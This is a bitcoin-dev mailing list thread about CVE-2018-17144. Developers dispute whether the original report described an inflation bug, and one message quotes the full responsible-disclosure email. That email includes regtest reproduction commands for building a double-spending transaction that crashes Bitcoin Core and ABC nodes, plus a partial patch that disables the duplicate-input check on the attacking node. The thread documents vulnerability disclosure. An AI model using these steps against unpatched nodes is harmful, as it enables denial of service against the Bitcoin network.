Re: [bitcoin-dev] Fwd: [bitcoin-core-dev] On the initial notice of CVE-2018-17144

[Gregory Maxwell via bitcoin-dev]

On Sat, Sep 22, 2018 at 7:22 PM sick...@gmail.com  wrote:
> > For some reason I don't understand, Andrea Suisani is stating on
> > twitter that the the report by awemany was a report of an inflation
> > bug, contrary to the timeline we published.
>
> guess that the fact you don't understand it, it's probably related to the fact
> that you didn't read properly the tweet you are referring to, for reference 
> this
> the tweet URL https://twitter.com/sickpig/status/1043530088636194816
>
> This is the text of such a tweet

OKAY.  The only tweet I was shown was this one:

https://twitter.com/sickpig/status/1043428373530390528

It doesn't many any mention to him not reporting it and I encountered
it in the context of another person citing it to claim it had been
reported.

> Furthermore as you should be aware, having been copied on the report,
> awemany specifically
> said that "[the assert(is_spent)] *seems* to prevent the worse outcome
> of monetary inflation"

Yes, in fact I referred to the that specifically in my message as well
as including his entire message in my post.

> I guess that in the hurry of informing you and other people involved of the 
> DoS
> vector he identified and proved, he decided to give priority to
> informing Core about that
> rather than waiting and continue exploring the idea he had about exploiting 
> the
> code to create coins out of thin air.

I'm unclear what you're now stating. Are you stating that awemany knew
that it could
cause inflation but indicated otherwise to us or are you stating that
he did not know and
in the abundance of caution he sent the report as fast as possible
before making that
determination?

I'm just asking because I'm confused by your response; I don't think
it's particularly important one way or another.
___
bitcoin-dev mailing list
bitcoin-dev@lists.linuxfoundation.org
https://lists.linuxfoundation.org/mailman/listinfo/bitcoin-dev

[bitcoin-dev] Fwd: [bitcoin-core-dev] On the initial notice of CVE-2018-17144

[Bryan Bishop via bitcoin-dev]

-- Forwarded message --
From: Gregory Maxwell via bitcoin-core-dev <
bitcoin-core-...@lists.linuxfoundation.org>
Date: Sat, Sep 22, 2018 at 12:12 PM
Subject: [bitcoin-core-dev] On the initial notice of CVE-2018-17144
To: bitcoin-core-...@lists.linuxfoundation.org


For some reason I don't understand, Andrea Suisani is stating on
twitter that the the report by awemany was a report of an inflation
bug, contrary to the timeline we published.   This is not the case:
the report specifically stated that inflation was not possible because
the node crashed. It also described a reproduction of the crash, but
not of inflation.

I generally understand how someone could be confused about what a
report they hadn't seen said, but I'm confused in this case because
Andrea Suisani was copied on the report to us. So I'm not sure what is
up with that, perhaps the message got lost in email.  If the reporter
knew the bug permitted inflation, they still specifically reported
otherwise to us.

Since people are also expressing doubt that awemany was actually the
author of the report, I'll include it here in its entity to aid
people's validation of the claim(s). There is a better test for the
crash issue include in master branch of the Bitcoin repository, the
reporter's reproduction instructions here are only included for
completeness.

Cheers,


Date: Mon, 17 Sep 2018 14:57:46 +
To: Pieter Wuille , deadalnix
, Andrea Suisani , Gregory
Maxwell , "Wladimir J. van der Laan"

From: beardnboobies 
Subject: Zero day exploit in Bitcoin ABC and Bitcoin Core

Dear Bitcoiners,

Please find attached an encrypted description of a crashing zero day
exploit for Bitcoin Core as well as Bitcoin ABC. This has not been
reproduced for Bitcoin Unlimited, though for advisory reasons, I am
sending it to one of their members that I could find a PGP key for as
well.

Please forward this to any party who might have a valid interest,
including Bitcoin miners.

Thank you very much.

===

Problem description:

The following, miner-exploitable zero day has been found in Bitcoin ABC as
well as in Bitcoin Core:

Duplicate inputs are not checked in CheckBlock,
only when they are accepted into the mempool.

This creates a problem insofar as a transaction might bypass
the mempool when it is included in a block, for example if
it is transmitted as an extra transaction along with a compact
block.

A later assertion assert(is_spent) in SpendCoins (in validation.cpp)
seems to prevent the worse outcome of monetary inflation by
the comparatively better result of crashing the node.

To reproduce (Description is for Bitcoin ABC, but applies similarly to
Bitcoin Core):

Create one instance of ABC bitcoind without the patch below
applied (A) and create on instance of ABC with the patch applied (B).
The patch removes sending of transactions and testing for double-spent
inputs for the attacker node.

Run both in regtest mode and point them to different data directories,
like so and connect them together:
A: ./bitcoind -regtest -rpcport=15000 -listen -debug -datadir=/tmp/abc.1
B: ./bitcoind -regtest -rpcport=15001 -connect=localhost -debug
-datadir=/tmp/abc.2

Now on the prepared attacker node B, create a bunch of blocks and a
transaction
that double-spends its input, like  so for example:

> ./bitcoin-cli -regtest -datadir=/tmp/abc.2 -rpcport=15001 generate 200

> ./bitcoin-cli -regtest -datadir=/tmp/abc.2 -rpcport=15001 getnewaddress


> ./bitcoin-cli -regtest -datadir=/tmp/abc.2 -rpcport=15001 sendtoaddress



> ./bitcoin-tx -regtest -create in=:
in=: outaddr=99.9:


The double entry of the input here is not a typo. This is the desired
double-spend.

Sign the resulting transaction hex like so:

> ./bitcoin-cli -regtest -datadir=/tmp/abc.2 -rpcport=15001
signrawtransaction 


For Core, this step needs to be adapted to signrawtransactionwithkey.
And send the result into the small regtest test netwrok:
> ./bitcoin-cli -regtest -datadir=/tmp/abc.2 -rpcport=15001
sendrawtransaction 

Voila, your node A should have just aborted like this:

bitcoind: validation.cpp:1083: void SpendCoins(CCoinsViewCache&, const
CTransaction&, CTxUndo&, int): Assertion `is_spent' failed.
Aborted (core dumped)

If you like this work or want to pay out a bounty for finding a zero day,
please do so in BCH to this address. Thank you very much in advance.

bitcoincash:qr5yuq3q40u7mxwqz6xvamkfj8tg45wyus7fhqzug5


The patch for ABC:

diff --git a/src/consensus/tx_verify.cpp b/src/consensus/tx_verify.cpp
index ee909deb9..ff7942361 100644
--- a/src/consensus/tx_verify.cpp
+++ b/src/consensus/tx_verify.cpp
@@ -229,7 +229,7 @@ static bool CheckTransactionCommon(const CTransaction
,

 // Check for duplicate inputs - note that this check is slow so we
skip it
 // in CheckBlock
-if (fCheckDuplicateInputs) {
+if (0) {
 std::set vInOutPoints;
 for (const auto  : tx.vin) {
 if (!vInOutPoints.insert(txin.prevout).second) {
diff --git